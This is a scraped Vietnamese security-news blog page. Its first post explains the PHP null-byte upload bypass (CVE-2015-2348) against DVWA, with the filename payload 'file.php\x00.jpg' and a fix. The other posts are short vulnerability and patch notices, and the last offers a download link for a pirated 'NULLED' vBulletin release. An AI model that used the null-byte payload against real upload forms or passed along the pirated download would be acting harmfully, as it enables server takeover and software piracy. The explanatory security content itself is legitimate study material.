class="hps">chức năng</span> <span class="hps">move_uploaded_files</span> của <span class="hps">php</span> <span class="hps">rất</span> <span class="hps">phổ biến</span> <span class="hps">được sử dụng</span> <span class="hps">để xử lý</span> <span class="hps">các tập tin</span> <span class="hps">được tải lên</span>. <span class="hps">Chức năng</span> <span class="hps">này kiểm tra để</span> <span class="hps">đảm bảo</span> <span class="hps">rằng</span> <span class="hps">các</span> <span class="hps">tập tin</span> <span class="hps">được chỉ định</span> <span class="hps">theo tên tập tin</span> <span class="hps">là</span> <span class="hps">một</span> <span class="hps">tập tin</span> <span class="hps">upload</span> <span class="hps">hợp lệ</span> <span class="hps atn">(</span>nghĩa là nó <span class="hps">đã được</span> <span class="hps">tải lên thông qua</span> <span class="hps">HTTP</span> <span class="hps">POST</span> <span class="hps">cơ chế</span> <span class="hps">upload</span> <span class="hps">PHP</span>). <span class="hps">Nếu tập tin</span> <span class="hps">có giá trị</span>, <span class="hps">nó</span> <span class="hps">sẽ</span> <span class="hps">được</span> <span class="hps">chuyển đến</span> <span class="hps">các</span> <span class="hps">tên tập tin</span> <span class="hps">đích.</span></span></span></span><br /> <span class="" id="result_box" lang="vi"><span class=""><span class="" id="result_box" lang="vi"><span class="hps">Ví dụ:</span></span></span></span><br /> <blockquote class="tr_bq"> <span class="" id="result_box" lang="vi"><span class=""><span class="" id="result_box" lang="vi"><span class="hps">move_uploaded_file ( string $filename , string $destination )  </span></span></span></span></blockquote> <span class="" id="result_box" lang="vi"><span class=""><span class="" id="result_box" lang="vi"><span class="hps"><span class="" id="result_box" lang="vi"><span class="hps">Các</span> <span class="hps">vấn đề</span> <span class="hps">với nó là</span> <span class="hps">có một cách</span> <span class="hps">để chèn</span> <span class="hps">byts</span> <span class="hps atn">null để bypass, </span></span></span></span></span></span><span class="" id="result_box" lang="vi"><span class=""><span class="" id="result_box" lang="vi"><span class="hps"><span class="" id="result_box" lang="vi"><span class="hps atn"><span class="" id="result_box" lang="vi"> <span class="hps">Sử dụng</span> <span class="hps">nullbytes</span> <span class="hps">một</span> <span class="hps">kẻ tấn công</span> <span class="hps">có thể</span> thực hiện bypass<span class="hps"></span> <span class="hps">upload</span><span class="">,</span> <span class="hps">các</span> <span class="hps">tập tin là</span> <span class="hps">tương đối</span> <span class="hps">hợp lệ</span> <span class="hps">và</span> <span class="hps">tải lên</span> <span class="hps">các tập tin</span> <span class="hps">độc hại có thể</span> <span class="hps">gây ra</span> <span class="hps">RCE</span> bằng cách sử dụng <span class="hps">sử dụng</span> <span class="hps">các</span> <span class="hps">ký tự \</span> <span class="hps">x00.</span></span></span></span></span></span></span></span><br /> <br /> <span class="" id="result_box" lang="vi"><span class=""><span class="" id="result_box" lang="vi"><span class="hps"><span class="" id="result_box" lang="vi"><span class="hps atn"><span class="" id="result_box" lang="vi"><span class="hps"><span class="" id="result_box" lang="vi"><span class="hps">Tôi sẽ</span> <span class="hps">lấy</span> <span class="hps">một ví dụ</span> với <span class="hps">DVWA với mức cao nhất</span><span class="hps"></span>.  <span class="hps">Dưới đây</span> <span class="hps">là mã</span> <span class="hps">snippit</span> <span class="hps">từ</span> <span class="hps">https://github.com/RandomStorm/DVWA/blob/master/vulnerabilities/upload/source/high.php</span>:</span> </span></span></span></span></span></span></span></span><br /> <blockquote class="tr_bq"> <span class="" id="result_box" lang="vi"><span class=""><span class="" id="result_box" lang="vi"><span class="hps"><span class="" id="result_box" lang="vi"><span class="hps atn"><span class="" id="result_box" lang="vi"><span class="hps"> </span></span></span></span></span></span></span></span><span class="" id="result_box" lang="vi"><span class=""><span class="" id="result_box" lang="vi"><span class="hps"><span class="" id="result_box" lang="vi"><span class="hps atn"><span class="" id="result_box" lang="vi"><span class="hps">$uploaded_name = $_FILES['uploaded']['name']; <br />$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1); $uploaded_size = $_FILES['uploaded']['size']; <br /><br />if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){ if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) { <br /><br />$html .= '';<br />$html .= 'Your image was not uploaded.'; <br />$html .= ''; } <br />else { <br />$html .= $target_path . ' succesfully uploaded!';<br />.<br />. </span></span></span></span></span></span></span></span></blockquote> <span class="" id="result_box" lang="vi"><span class=""><span class="" id="result_box" lang="vi"><span class="hps"><span class="" id="result_box" lang="vi"><span class="hps atn"><span class="" id="result_box" lang="vi"><span class="hps"><span class="" id="result_box" lang="vi"><span title="Expected behavior for PHP to create: ">Dự kiến ​​hành vi bypass PHP để tạo ra:</span></span></span></span></span></span></span></span></span></span><br /> <blockquote class="tr_bq"> <span class="" id="result_box" lang="vi"><span class=""><span class="" id="result_box" lang="vi"><span class="hps"><span class="" id="result_box" lang="vi"><span class="hps atn"><span class="" id="result_box" lang="vi"><span class="hps"><span class="" id="result_box" lang="vi"><span title="move_uploaded_file($_FILES['name']['tmp_name'],"/file.php\x00.jpg") ">move_uploaded_file ($ _ FILES ['name'] ['tmp_name'], "/ file.php \ x00.jpg")</span></span></span></span></span></span></span></span></span></span></blockquote> <span class="" id="result_box" lang="vi"><span class=""><span class="" id="result_box" lang="vi"><span class="hps"><span class="" id="result_box" lang="vi"><span class="hps atn"><span class="" id="result_box" lang="vi"><span class="hps"><span class="" id="result_box" lang="vi"><span title="That file should have created the file "file.php\x00.jpg" ">và đã tạo ra các tập tin "<b>file.php \ x00.jpg</b>"</span><span title="Reality creates: file.php ">Thực tế thì nó tạo ra: <b>file.php</b></span></span> </span></span></span></span></span></span></span></span><br /> <br /> <span class="" id="result_box" lang="vi"><span class=""><span class="" id="result_box" lang="vi"><span class="hps"><span class="" id="result_box" lang="vi"><span class="hps atn"><span class="" id="result_box" lang="vi"><span class="hps"><span class="" id="result_box" lang="vi"><span title="Now we could have done multiple checks for this, however its unlikly we blacklisted the char \x00 so most upload forms running PHP before 5.4.39, 5.5.x before 5.5.23, and 5.6.x before 5.6.7 are vulnerable for this">Hầu hết các hình thức upload chạy <b>PHP  trước 5.4.39, 5.5.x trước 5.5.23, và 5.6.x trước 5.6.7</b> đều dính lỗi này.</span></span></span></span></span></span></span></span></span></span><br /> <br /> <span class="" id="result_box" lang="vi"><span class=""><span class="" id="result_box" lang="vi"><span class="hps"><span class="" id="result_box" lang="vi"><span class="hps atn"><span class="" id="result_box" lang="vi"><span class="hps"><span class="" id="result_box" lang="vi"><span title="Now we could have done multiple checks for this, however its unlikly we blacklisted the char \x00 so most upload forms running PHP before 5.4.39, 5.5.x before 5.5.23, and 5.6.x before 5.6.7 are vulnerable for this"><br /><b>Cách khắc phục</b><br />Lọc bỏ giá trị Nullbyte trong tên của tệp tin tải lên máy chủ ($_FILES[‘uploaded’][‘name’]) trước khi sử dụng hàm move_uploaded_file và cập nhật lên các bản PHP mới nhất đã vá lỗi.<br /> </span></span> </span></span></span></span> </span></span> </span></span><br /> <span class="" id="result_box" lang="vi"><span class=""><b>Dịch từ: www.paulosyibelo.com </b></span></span>

Exploiting PHP Upload forms

Hôm nay tôi muốn gửi về các lỗi gần đây nhất mà tôi đã tìm thấy trong PHP, CVE-2015-2348. Lỗi này là khá quan trọng (xem xét số lượng của các nhà phát triển bị ảnh hưởng). Vấn đề xảy ra trong chức năn…

Đọc thêm »

Facebook Vulnerability Leaks Users' Private Photos

<div style="text-align: center;"> <a class="highslide" href="http://farm9.staticflickr.com/8734/16703484329_1ee636788f_o.png"><img alt="" border="0" height="266" id="hs_imageresizer_container_1" src="http://farm9.staticflickr.com/8734/16703484329_1ee636788f_o.png" width="500" /></a> <br /> </div> <br /> <br /> Nếu bạn đã kích hoạt tính năng Facebook Photo Sync tự động trên các thiết bị iPhone, iPad hoặc Android của bạn, Hãy coi chừng! Tin tặc có thể ăn cắp hình ảnh cá nhân của bạn mà bạn không biết.<br /> <br /> Những hình ảnh mà bạn đã đồng bộ hóa từ điện thoại của bạn sẽ tự động được tải lên trong một album Facebook cá nhân, màbạn bè Facebook của bạn hoặc những người dùng Facebook khác không thể nhìn thấy. Tuy nhiên, bạn có thể chọn để chia sẻ hình ảnh từ các album trên timeline Facebook của bạn hoặc gửi chúng dưới dạng tin nhắn cho bạn bè.<br /> <br /> Nhà ngiên cứu bảo mật Laxman Muthiyah, đã phát hiện ra một lỗ hổng nghiêm trọng trong các tính năng của Facebook Photo Sync và Facebook API có thể cho phép bất kỳ ứng dụng nào của bên thứ ba truy cập hình ảnh cá nhân của bạn từ Facebook Photo Sync album ẩn.<br /> <br /> Trong một bài viết trên blog được xuất bản ngày hôm nay, Laxman giải thích rằng lỗ hổng này nằm trong cơ chế ưu đãi mà các ứng dụng nào được phép truy cập hình ảnh đồng bộ sử dụng vaultimages API.<br /> <br /> "Các phần dễ bị tổn thương, nó chỉ cần kiểm tra các chủ sở hữu của các access token và không phải là ứng dụng được làm theo yêu cầu. Vì vậy, nó cho phép bất kỳ ứng dụng với user_photos phép đọc hình ảnh điện thoại di động của bạn," Laxman đã viết trong một bài đăng blog.<br /> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br />Về mặt kỹ thuật, đồng bộ hoá album ảnh cá nhân chỉ có thể truy cập bằng ứng dụng chính thức của Facebook, nhưng lỗ hổng này cho phép bất kỳ ứng dụng nào của bên thứ 3 cũng có thể đọc được hình ảnh cá nhân của bạn.<br /> <br /> Laxman công bố trước đó một lỗ hổng trong cơ chế Facebook Graph API cho phép ông để xóa bất kỳ album ảnh trên Facebook thuộc sở hữu của bất cứ người nào, bất kỳ trang nào hoặc bất kỳ nhóm nào.<br /> <br /> <span style="color: red;"><b>LÀM THẾ NÀO ĐỂ VÔ HIỆU AUTO-SYNC</b></span><br /> <br /> Mặc dù, Facebook đã vá lỗ hổng được báo cáo bởi Laxman và thưởng cho ông $10,000, người dùng Facebook nên tắt tính năng Facebook Photo Sync để được ở bên an toàn hơn.<br /> <br /> Để làm như vậy, chỉ cần vào ứng dụng di động Facebook , di chuyển xuống và chọn Account> App Settings> Sync Photos, sau đó Chọn 'Đừng đồng bộ hình ảnh của tôi.'<div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br />Nguồn bài viết: <a href="http://vansan.name.vn/threads/128-facebook-dinh-loi-do-ri-anh-ca-nhan-cua-nguoi-dung.html#ixzz3V5V5T0K7" style="color: #003399;">http://vansan.name.vn/threads/128-facebook-dinh-loi-do-ri-anh-ca-nhan-cua-nguoi-dung.html#ixzz3V5V5T0K7</a></div> </div>

Facebook Vulnerability Leaks Users' Private Photos

Nếu bạn đã kích hoạt tính năng Facebook Photo Sync tự động trên các thiết bị iPhone, iPad hoặc Android của bạn, Hãy coi chừng! Tin tặc có thể ăn cắp hình ảnh cá nhân của bạn mà bạn không biế…

Đọc thêm »

Drupal cập nhật bản vá lỗi bảo mật Password-Reset

<div class="separator" style="clear: both; text-align: center;"> <a href="http://farm8.staticflickr.com/7621/16701993490_050f5efba7_o.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="http://farm8.staticflickr.com/7621/16701993490_050f5efba7_o.png" width="320" /></a></div> <br /> <div style="text-align: center;"> </div> <br /> <br /> <div style="text-align: center;"> <br /></div> <div style="text-align: center;"> <br /></div> <div style="text-align: left;"> <span class="" id="result_box" lang="vi"><span title="Drupal, one of the widely used open source content management system is recommending its users to update their software to the latest versions 6.35 and 7.35 after the company discovered two moderately critical vulnerabilities that may allow an attacker to hack Drupal websites. ">Drupal, một trong những mã nguồn mở hệ thống quản lý nội dung được sử dụng rộng rãi đã khuyến cáo người sử dụng cập nhật phần mềm của họ lên các phiên bản mới nhất 6.35 và 7,35 sau khi công ty đã phát hiện hai lỗ hổng quan trọng có thể cho phép kẻ tấn công hack các trang web Drupal.</span></span><br /><br /> <span class="" id="result_box" lang="vi"><span title="According to a security advisory published yesterday, a flaw found in the Drupal core could allow a potential hacker under certain circumstances to bypass security restrictions by forging the password reset URLs. ">Theo một cố vấn an ninh, một lỗ hổng tìm thấy trong Drupal có thể cho phép một hacker tiềm năng trong những hoàn cảnh nhất định vượt qua những hạn chế bảo mật bằng cách bypass reset pasword.</span></span><br /><br /> ACCESS BYPASS / PASSWORD RESET URLs dễ bị tổn thương, các hacker có thể bypass và truy cập trái phép vào tài khoản người dùng mà không cần mật khẩu.<br /><br /> Lỗ hổng này khá nguy hiểm, trong đó kẻ tấn công có thể lừa người dùng website, quản trị viên website và tung ra 1 URL độc hại để kiểm soát các máy chủ.<br /><br /> Vấn đề thực sự nghiêm trọng vì Drupal được sự dụng khá phổ biến trên thế giới. Chính vì vậy Drupal đã phát hành phiên bản vá lỗi ngay lập tức. <br /><br /><span style="font-size: medium;"><span style="color: red;"><strong>Khuyến cáo</strong></span></span><br /><br />- Nhà phát hành Drupal khuyến cáo người sử dụng cập nhât lên phiên bản mới nhất là <span class="" id="result_box" lang="vi"><span title="Update to the latest version of Drupal core, ie Drupal core 6.35 and Drupal core 7.35     ">Drupal core 6.35 và Drupal core 7,35</span></span><br />- <span class="" id="result_box" lang="vi"><span title="Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.     ">Chạy tất cả các phần mềm như là một người dùng không có đặc quyền (không có quyền quản trị) để giảm bớt những ảnh hưởng của một cuộc tấn công.</span></span><br />-  <span class="" id="result_box" lang="vi"><span title="Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.     "></span><span title="Do not click on links from unknown sources.     ">Không bấm vào các liên kết từ các nguồn không rõ.<br />- <span class="" id="result_box" lang="vi"><span title="Do not click on links from unknown sources.     "></span><span title="Do not open email attachments from unknown or untrusted sources.     ">Không nên mở file đính kèm email từ các nguồn không rõ hoặc không tin cậy.<br />- <span class="" id="result_box" lang="vi"><span title="Do not open email attachments from unknown or untrusted sources.     "></span><span title="Consider implementing file extension whitelists for allowed e-mail attachments.">Xem xét việc thực hiện danh sách cho phép mở rộng tập tin cho phép file đính kèm e-mail.</span></span></span></span></span></span></div> <div style="text-align: left;"> <br /></div> <div style="text-align: left;"> <span class="" id="result_box" lang="vi"><span title="Do not click on links from unknown sources.     "><span class="" id="result_box" lang="vi"><span title="Do not open email attachments from unknown or untrusted sources.     "><span class="" id="result_box" lang="vi"><span title="Consider implementing file extension whitelists for allowed e-mail attachments.">Nguồn: <a href="http://vansan.name.vn/threads/127-drupal-cap-nhat-ban-va-loi-bao-mat-password-reset.html" target="_blank">http://vansan.name.vn/threads/127-drupal-cap-nhat-ban-va-loi-bao-mat-password-reset.html</a></span></span></span></span></span></span></div>

Drupal cập nhật bản vá lỗi bảo mật Password-Reset

Đọc thêm »

WordPress Plugin 'Google Analytics by Yoast' cập nhật bản vá lỗi bảo mật

<div style="text-align: center;"> <a class="highslide" href="http://farm8.staticflickr.com/7607/16889285735_363ee01304_o.png"><img alt="" border="0" height="268" id="hs_imageresizer_container_1" src="http://farm8.staticflickr.com/7607/16889285735_363ee01304_o.png" width="500" /></a><br /> </div> <br /> Một wordpress plugins khá phổ biến được phát hành bới Yoast đã được phát hiện có một lỗi bảo mật khá nghiêm trọng có thể bị tin tặc lợi dụng để chiếm quyền điều khiển website.<br /> <br /> Các lỗ hổng nghiêm trọng được phát hiện trong plugins 'Google Analytics by Yoast' trợ giúp quản trị viên theo dõi lưu lượng truy cập trang web bằng cách kết nối đến tài khoản Google Analytics của họ.<br /> Google Analytics bởi Yoast WordPress plugin đã được tải về gần 7 triệu lần với hơn 1 triệu lượt cài đặt, khiến cho ảnh hưởng của bug khá nghiêm trọng.<br /> <br /> Plugins 'Google Analytics by Yoast' dính lỗi bảo mật cross-site scripting (XSS) lỗ hổng cho phép tin tặc thực thi mã PHP độc hại trên máy chủ để chiểm quyền tài khoản quản trị viên. Mã độc hại này có thể được kích hoạt khi quản trị viên chỉ xem các cài đặt Plugin 'Google Analytics by Yoast'. Tất cả điều này có thể được thực hiện thành công mà không cần yêu cầu xác thực.<br /> <br /> Jouko Pynnönen - công ty IT Phần Lan Klikki Oy đã phát hiện và công bố lỗ hổng, trong đó,và Yoast đã phát hành bản vá lỗi ngay sau một ngày.<br /> <br /> Hiện tại Yoast đã phát hành phiên bản 5.3.3 để vá lỗ hổng bảo mật nguy hiểm này. Các bạn có thể cập nhật plugins tại đây<br /> <br /> <br /> <br /> <div style="text-align: center;"> <a href="http://vansan.name.vn/redirect.php?https%3A%2F%2Fwordpress.org%2Fplugins%2Fgoogle-analytics-for-wordpress%2F" rel="nofollow" target="_blank"><b>DOWNLOAD PLUGIN</b></a></div> <div style="text-align: center;"> <b> </b></div> <div style="text-align: left;"> <b>Nguồn: <a href="http://vansan.name.vn/threads/126-Wordpress-plugin-google-analytics-by-yoast-cap-nhat-ban-va-loi.html" target="_blank">http://vansan.name.vn/threads/126-Wordpress-plugin-google-analytics-by-yoast-cap-nhat-ban-va-loi.html</a> </b></div>

WordPress Plugin 'Google Analytics by Yoast' cập nhật bản vá lỗi bảo mật

Một wordpress plugins khá phổ biến được phát hành bới Yoast đã được phát hiện có một lỗi bảo mật khá nghiêm trọng có thể bị tin tặc lợi dụng để chiếm quyền điều khiển website. Các lỗ hổng nghiêm…

Đọc thêm »

Adobe Flash Player cập nhật phiên bản mới vá 11 lỗ hổng bảo mật quan trọng

<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP1FcCEuF05kUzdeM50J3kUyp9NeXpgLbxQl9mFxqlI-HNgIoVwyl7yffyz7RwDLuvPW5Z_XIrjLJNuT14WT7YecKmugKAIvr-rfWO5tboOUGfGQhik0DhmH95My9Eml_-zUy8zkzvVjsg/s1600/flash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP1FcCEuF05kUzdeM50J3kUyp9NeXpgLbxQl9mFxqlI-HNgIoVwyl7yffyz7RwDLuvPW5Z_XIrjLJNuT14WT7YecKmugKAIvr-rfWO5tboOUGfGQhik0DhmH95My9Eml_-zUy8zkzvVjsg/s1600/flash.png" width="320" /></a></div> <br /> <br /> <span class="" id="result_box" lang="vi"><span title="Adobe has rolled-out an update for its popular Flash Player software that patches a set of 11 critical security vulnerabilities in its program, most of which potentially allow hackers to remotely execute arbitrary code on vulnerable systems.  ">Adobe đã tung ra một bản cập nhật cho phần mềm Flash Player vá 11 lỗ hổng bảo mật nghiêm trọng , hầu hết trong số đó có khả năng cho phép tin tặc thực thi mã tùy ý từ xa vào hệ thống.<br /><br /><b> </b></span><span title="AFFECTED SOFTWARE "><b>PHẦN MỀM BỊ ẢNH HƯỞNG</b></span><span title="All versions prior to the latest version 17.0.0.134 of the Flash Player are affected on Windows and Mac OS X machines."> </span></span><br /> <br /> <span class="" id="result_box" lang="vi"><span title="All versions prior to the latest version 17.0.0.134 of the Flash Player are affected on Windows and Mac OS X machines.">Tất cả các phiên bản trước phiên bản mới nhất 17.0.0.134 của Flash Player bị ảnh hưởng trên các máy Windows và Mac OS X. </span><span title="Therefore, Adobe Flash Player installed with Google Chrome, as well as Internet Explorer 10 and 11 on Windows 8 and Windows 8.1, should automatically update to the newest version 17.0.0.134. ">Do đó, Adobe Flash Player được cài đặt với Google Chrome, cũng như Internet Explorer 10 và 11 trên Windows 8 và Windows 8.1, sẽ tự động cập nhật phiên bản mới nhất 17.0.0.134.</span></span><br /> <span class="" id="result_box" lang="vi"><span title="Therefore, Adobe Flash Player installed with Google Chrome, as well as Internet Explorer 10 and 11 on Windows 8 and Windows 8.1, should automatically update to the newest version 17.0.0.134. "><br /></span><span title="In addition, Adobe Flash Player 11.2.202.442 for Linux and Flash Player Extended Support Release 13.0.0.269 for Windows and Mac OS X are also affected by the vulnerabilities. ">Ngoài ra, Adobe Flash Player 11.2.202.442 cho Linux và </span></span><span class="" id="result_box" lang="vi"><span title="In addition, Adobe Flash Player 11.2.202.442 for Linux and Flash Player Extended Support Release 13.0.0.269 for Windows and Mac OS X are also affected by the vulnerabilities. "><span class="main-article-info">Flash Player Extended Support phiên bản</span> 13.0.0.269 cho Windows và Mac OS X cũng bị ảnh hưởng bởi những lỗ hổng này.</span><span title="So, users of Flash Player on Linux should update to version 11.2.202.451 and Flash Player Extended Support Release on Windows and Mac are recommended to update to version 13.0.0.277.">Vì vậy, người sử dụng Flash Player trên Linux nên cập nhật lên phiên bản 11.2.202.451 và </span></span><span class="" id="result_box" lang="vi"><span title="So, users of Flash Player on Linux should update to version 11.2.202.451 and Flash Player Extended Support Release on Windows and Mac are recommended to update to version 13.0.0.277."><span class="main-article-info">Flash Player Extended Support</span> trên Windows và Mac được khuyến cáo cập nhật lên phiên bản 13.0.0.277.</span></span>

Adobe Flash Player cập nhật phiên bản mới vá 11 lỗ hổng bảo mật quan trọng

Đọc thêm »

Potential vBSEO vulnerability

<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHgFPX8FZ7FAyy8RG17UvIwW4qv9vj0PKniYV07SUbMBchlkbLi0x3jUzPXWAxKT8zIoQUWhFkYpZYr4nSsGLtmgEWgROPGfLUiSnGNqBmMHmdftDxT9fxxVqHvd6gHn0fS4HXFe9gAHyb/s1600/vbseo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHgFPX8FZ7FAyy8RG17UvIwW4qv9vj0PKniYV07SUbMBchlkbLi0x3jUzPXWAxKT8zIoQUWhFkYpZYr4nSsGLtmgEWgROPGfLUiSnGNqBmMHmdftDxT9fxxVqHvd6gHn0fS4HXFe9gAHyb/s1600/vbseo.jpg" width="320" /></a></div> <br /> It has come to our attention that there may be a potential security vulnerability in VBSEO affecting the latest version of the software (and potentially other versions as well). We've attempted to contact the vendor, but as they have been non-responsive we felt we should alert the community as many of our customers use this add-on software.<br /> <br /> If you think you might be running a vulnerable version of the software, there is a simple fix: just comment out the following lines in the file vbseo/includes/functions_vbseo_hook.php:<br /> <blockquote class="tr_bq">  if(isset($_REQUEST['ajax']) && isset($_SERVER['HTTP_REFERER']))<br />$permalinkurl = $_SERVER['HTTP_REFERER'].$permalinkurl;</blockquote>  should be changed to:<br /> <blockquote class="tr_bq">  // if(isset($_REQUEST['ajax']) && isset($_SERVER['HTTP_REFERER']))<br />// $permalinkurl = $_SERVER['HTTP_REFERER'].$permalinkurl;</blockquote>  If you are running the "Suspect File Versions" diagnostics tool, you will additionally need to generate a new MD5 sum of the above file and edit upload/includes/md5_sums_crawlability_vbseo.php to use the new MD5 sum on the line:<br /> <br /> 'functions_vbseo_hook.php' => 'NEW MD5 SUM GOES HERE',<br /> <br /> Please be aware that you are making these changes at your own risk. We don't know if making this change affects the terms of your VBSEO license and we can't be responsible if making this change breaks your site.<br /> <br /> <b>Read more: </b> <a href="http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4261146-potential-vbseo-vulnerability" rel="nofollow" target="_blank">http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4261146-potential-vbseo-vulnerability</a>

Potential vBSEO vulnerability

It has come to our attention that there may be a potential security vulnerability in VBSEO affecting the latest version of the software (and potentially other versions as well). We've attempted to …

Đọc thêm »

vBulletin Forum v4.2.2 Patch Level 4 NULLED PHP-ECHO

<br /> <div class="separator" style="clear: both; text-align: center;"> </div> <div class="separator" style="clear: both; text-align: center;"> </div> <div class="separator" style="clear: both; text-align: center;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUYsp-G3IDEXYscilj0WxFkCgQ9wwQp5EPDwQIclmQrLTNoJ9iXi8pIOx93isUWkNvQx96A6T9dduKP_jYx14u0Ao4TT_aBq41RbxOI99GQwsNIFrkEGnsXj2eyC637MbTxVVfDbOVODmx/s1600/vbb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUYsp-G3IDEXYscilj0WxFkCgQ9wwQp5EPDwQIclmQrLTNoJ9iXi8pIOx93isUWkNvQx96A6T9dduKP_jYx14u0Ao4TT_aBq41RbxOI99GQwsNIFrkEGnsXj2eyC637MbTxVVfDbOVODmx/s1600/vbb.jpg" /></a></div> <br /> <br /> <div style="text-align: center;"> <a href="http://adf.ly/1A8svi" rel="nofollow" target="_blank"><b>DOWNLOAD</b></a></div> <div style="text-align: center;"> <b>Pass unrar:  quylevhb.blogspot.com </b></div> <br /> <br /> <blockquote class="tr_bq">  ___________________________________        _________________/\<br /> |           |  |            \       \      /                   \  /\<br /> |           |  |             \      |      |     /     ____     \/ /<br /> |      _____|  |         _____\     |______|     |    /    \      /<br /> |      \_____  \         |                       |    |    |      \<br /> |            \  \        |                       |    |    |      /<br /> |        _____\  \       |_____      ______      |    \____/     |<br /> |       /______  /            /     |      |     \               ||<br /> |             /__\           /      |      |      ______________ //<br /> |___________________________/       |      \_____/    __________///<br />   \________________________         |        \_______/////////////<br />     \______________________\________/          \_____\\\\\\\\\\\\\<br />     /                                       ______/<br />     >  </ R E L E A S E  I N F O >        ____/<br />     \_______________________    ____________/<br />      ______________________/    \_____________________________________________<br />     /                                                                         \<br /><br />       SCRiPT......: VBulletin.Solutions.vBulletin.Forum.v4.2.2.Patch.Level.4.NULLED.PHP-ECHO<br />       URL.........: http://www.vbulletin.com/<br />       PROTECTiON..: N/A<br />       SUPPLiED BY.: FRiEND<br />       RELEASE DATE: 17-02-2015<br /><br />     \__                                            ___________________________/<br />     /                                       ______/<br />     >  </ D E S C R I P T I O N >         ____/<br />     \_______________________    ____________/<br />      ______________________/    \_____________________________________________<br />     /                                                                         \<br /><br />       vBulletin (vB) is a proprietary Internet forum software produced by<br />       Jelsoft Enterprises and vBulletin Solutions.<br /><br />     \__                                            ___________________________/<br />     /                                       ______/<br />     >  </ I N S T A L L A T I O N >       ____/<br />     \_______________________    ____________/<br />      ______________________/    \_____________________________________________<br />     /                                                                         \<br /><br />       1. Extract the zip files to a folder on your computer.<br />       2. Read the vb4_readme.html.<br /><br />     \__                                            ___________________________/<br />     /                                       ______/<br />     >  </ C O N T A C T >                 ____/<br />     \_______________________    ____________/<br />      ______________________/    \_____________________________________________<br />     /                                                                         \<br /><br />       MAiL:..........: team.echo@openmailbox.org<br />       Home:..........: http://teamecho.rocks/<br /><br />     \__                                            ___________________________/<br />     /                                       ______/<br />     >  </ G R E E T I N G S >             ____/<br />     \_______________________    ____________/<br />      ______________________/    \_____________________________________________<br />     /                                                                         \<br /><br />       ECHO sends GREETS to:<br />       All groups and people working hard, who bring quality releases...<br /><br />      __                                                                      __<br />     /_/\                ____________________                                /\_\<br />     \_\/  _______      /            __   __ \                   by xsp!d3r  \/_/<br />      \   /_     /     /_____          \ /  \/        _________________________/<br />       \ / /     \    /    / \__/\_____/ \___________/<br />        ;-/_     /   /  __/<br />            \/\ /   /  /<br />               \\  /__/<br />                \\/_/<br />                 \/<br />                           </blockquote>

vBulletin Forum v4.2.2 Patch Level 4 NULLED PHP-ECHO

DOWNLOAD Pass unrar:  quylevhb.blogspot.com  ___________________________________        _________________/\ |           |  |            \       \      /                   \  /\ |           |  |     …

Đọc thêm »